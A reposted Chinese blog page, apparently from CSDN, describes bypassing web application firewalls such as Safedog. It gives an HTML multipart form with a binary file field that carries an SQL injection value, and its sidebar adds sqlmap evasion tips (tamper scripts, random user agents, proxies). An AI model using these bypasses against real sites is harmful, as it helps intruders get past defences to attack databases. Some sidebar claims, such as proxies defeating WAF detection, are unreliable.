轻松绕各种WAF的POST注入、跨站防御(比如安全狗)

最新推荐文章于 2020-12-12 09:21:16 发布
最新推荐文章于 2020-12-12 09:21:16 发布
阅读量424 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/develop/p/3884872.html
版权

XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。

构建如下HTML表单:

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>yzmm - p2j.cn</title>
</head>
<body>
<form action="http://webshell.cc/index.php" method="POST" enctype="multipart/form-data">
File:<input type="file" name="file" /><br/>
ID:<input type="text" name="id" value="select 1 from mysql.user--" style="width:250px;" / ><br/>
<input type="submit" value="提交" />
</form>
</body>
</html>

index.php:

 

<?php
echo "POST-ID:".$_POST['id']."<br/>GET-ID:".$_GET['id'];
?>

提交带二进制文件的请求:

成功绕过。

 

 

本站内容均为原创,转载请务必保留署名与链接!
轻松绕各种WAF的POST注入、跨站防御(比如安全狗):http://www.webshell.cc/4464.html

转载于:https://www.cnblogs.com/develop/p/3884872.html

weixin_33751566
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
人与狗
10-03 4万+
这个话题其实是很沉重的,我没有能力把握这个主题,但冒昧的我还是想把这积在心中的一点想法与部落的各位交流。人与狗的关系自原始人打猎开始就有了一贯如一的定义:狗是人的忠实伙伴和重要帮手。当然除了这种主要关系之外,还有好多花絮似的作用...
WAF详解及WAF
赤赤三的博客
03-20 8739
waf(web application firewall): 原理: web应用防火墙,一款集网内容安全防护、网资源安全防护及流量保护功能为一体的服务器工具。为用户提供实时网安全防护,避免各类针对网的攻击带来的危害。(核心其实也是基于规则的防御)| 任何工具(Awvs、IPS、IDS)其实都是基于规则进行匹配,最多加个爬虫功能 功能: 网马|木马主动防御及查杀 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90% 网漏洞防御
waf可以查看post请求吗_WAF(Web应用防火墙)浅析
weixin_39731845的博客
12-01 632
一次性付费进群,长期免费索取教程,没有付费教程。进微信群回复公众号:微信群;QQ群:460500587教程列表见微信公众号底部菜单 |本文底部有推荐书籍微信公众号:计算机与网络安全ID:Computer-network1、关于WAFWAF(Web Application Firewall,Web应用防火墙)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提...
waf可以查看post请求吗_「网络安全」安全设备篇(6)——WAF
weixin_39866963的博客
12-12 118
什么是WAFWAF是英文"Web Application Firewall"的缩写,中文意思是"Web应用防火墙",也称为"网应用级入侵防御系统"。WAF是集WEB防护、网页保护、负载均衡、应用交付于一体的WEB整体安全防护设备。WAF需要部署在Web服务器的前面,串行接入,不仅在硬件性能上要求高,而且不能影响Web服务,所以HA功能、Bypass功能都是必须的,而且还要与负载均衡、Web C...
[转]Web应用防火墙WAF详解
热门推荐
heiyeluren的blog(黑夜路人的开源世界)
05-05 1万+
本文详细描述了从Nginx配置到打造一个WAF,到现有可用WAF工具的过程,希望有参考学习价值。
深入了解SQL注入waf和过滤机制
05-04
本篇文章深入探讨了SQL注入攻击如何WAF,提供了多种过方法和测试向量,旨在帮助安全从业者了解攻击者的策略,从而提升防御能力。 0x06 参考资料 为了深入了解这一主题,可以查阅更多相关文献和技术文档,...
基于正则类sql注入防御过技巧.pdf
08-07
Range之前发现了xx狗的...分别讲了注释类过和长度类过,另外也说明了各类waf通常对POST注入默认不开启,通过默认配置的遗漏来注入防御。并展示了拒绝服务漏洞的视频,以及挖掘思路。 简介 注释类 长度类 终极版
[基础架构安全]高级攻防演练下的Webshell.zip
11-04
Webshell的植入通常源于Web应用程序中的安全漏洞,如SQL注入脚本(XSS)或文件包含漏洞等。SQL注入允许攻击者通过构造恶意SQL语句来获取数据库权限,而XSS则可能使攻击者能够执行客户端的恶意脚本。文件包含...
WAF产品经理眼中比较理想的WAF.pdf
07-23
WAF】全称为Web应用防火墙,是专门用于保护Web应用程序的安全产品,它通过执行HTTP/HTTPS安全策略,防止SQL注入、XSS脚本、远程命令执行和目录遍历等常见攻击。WAF在许多互联网公司的安全防御体系中扮演着关键...
05-浅谈企业SQL注入漏洞的危害与防御1
08-03
SQL注入是一种长期存在的网络安全威胁,尤其在企业环境中,它的危害性不容忽视。SQL注入攻击主要通过利用不安全的编程或配置,使得攻击者能够在应用程序执行的SQL语句中插入恶意代码,从而对数据库进行非法操作,...
web安全云防护系统
05-31
web安全云防护系统web安全云防护系统web安全云防护系统web安全云防护系统web安全云防护系统web安全云防护系统
post表单防止注入
01-22
post表单,这个不知道大家会不会,传上来分享一下,呵呵
【干货】记一次WAF对抗赛详解&全方位WAF
Enweitech Software Works
07-02 1万+
0x01 preview 上个星期参加了某巨头厂商承办的挑战赛,比赛周期48小时,题目是成功渗透在安全宝保护下的五个通用cms靶场,其中包括论坛、商城、资源网等 从靶场布置来看很明显是在测试安全宝对于几种不同类型cms的对攻击的防御能力。 这样的比赛模式区别于常见的CTF线上模式稍有不同,实战味道较强。常规的CTF在Web题目上面主要考察的是漏洞挖掘和利用,难点一般凸显在发现难和利
WAF是如何被过的?
hackzkaq的博客
11-19 868
作者:掌控安全学员-暗箭 欢迎关注公众号:掌控安全EDU 不知不觉来到掌控学院也快两个月了,想起俩个月前,从零开始,一步一个脚印的走到现在。 虽然有时很疲惫,但是却很快乐。 在下才疏学浅,仅在这里发表一下不成熟的见解,希望对大家的提升有所帮助 首先我们要了解什么是waf: Web应用防火墙,Web Application Firewall的简称 我们口头相谈的waf有什么功能呢? WAF可以发现和拦截各类Web层面的攻击,记录攻击日志,实时预警提醒,在Web应 用本身存在缺陷的情况下保障其安全。 但是,.
waf技巧之sql注入
f1gure的博客
05-12 1511
waf,全名web application firewall,名为web应用防火墙,其实就是市面上的狗、锁、盾、神、宝等等。。可以保护主机、监控流量等。
防止通过POST和GET方法SQL注入的两个最彻底过滤程序
jazywoo_在路上
12-13 4668
出处http://www.myhack58.com/Article/html/3/68/2011/31262.htm 先针对POST递交上来的信息过滤程序 Public Function filterStr(str)    str=replace(str,CHR(59),";") '“;”    str=replace(str,CHR(38),"&") '“&”    str=r
waf 添加精准访问防护规则
quliuwuyiz的博客
03-12 3080
waf 精准匹配防护规则,配置启用的时候,需要放置误判,最可能的在测试环境测试通过之后在上生产,防止误判被杀的情况。规则配置找了一个厂商的配置说明,作为参考,大部分厂商的配置应该都是一样的。 https://support.huaweicloud.com/usermanual-waf/waf_01_0009.html ...
sqlmapwaf注入
最新发布
05-21
SQLMap是一款常用的SQL注入工具,但是在一些情况下,可能会被Web应用程序防火墙(WAF)检测到并且阻止进一步的注入攻击。下面是一些WAF的SQLMap注入技巧: 1. 修改HTTP头部 在SQLMap中使用`--headers`选项来修改HTTP头部,例如: ``` sqlmap -u "http://example.com?id=1" --headers="User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" ``` 这将向请求添加一个自定义的User-Agent头部,从而WAF的检测。 2. 使用代理 使用代理服务器时,WAF通常无法检测到SQL注入攻击,因为它只能检测来自客户端的请求。在SQLMap中使用`--proxy`选项来指定代理服务器,例如: ``` sqlmap -u "http://example.com?id=1" --proxy=http://127.0.0.1:8080 ``` 这将使用本地代理服务器进行注入攻击。 3. 使用多个随机User-Agent头部 使用多个随机的User-Agent头部可以使WAF难以检测到SQL注入攻击。在SQLMap中使用`--random-agent`选项来随机生成User-Agent头部,例如: ``` sqlmap -u "http://example.com?id=1" --random-agent ``` 这将在每个请求中使用随机生成的User-Agent头部。 4. 使用不同的HTTP方法 WAF通常只检测常见的HTTP方法,如GET和POST。在SQLMap中使用`--method`选项来指定不同的HTTP方法,例如: ``` sqlmap -u "http://example.com?id=1" --method=PUT ``` 这将使用PUT方法进行注入攻击,从而WAF的检测。 5. 使用Tamper脚本 Tamper脚本是SQLMap的一个功能,可以修改SQL注入的请求和响应。在SQLMap中使用`--tamper`选项来指定Tamper脚本,例如: ``` sqlmap -u "http://example.com?id=1" --tamper=space2comment ``` 这将使用space2comment Tamper脚本,将空格转换为注释,从而WAF的检测。 总之,以上这些技巧并不一定都能够成功WAF的检测,要根据具体情况选择合适的方法。同时,为了避免被WAF检测到,也可以使用其他工具或手动注入的方式来进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值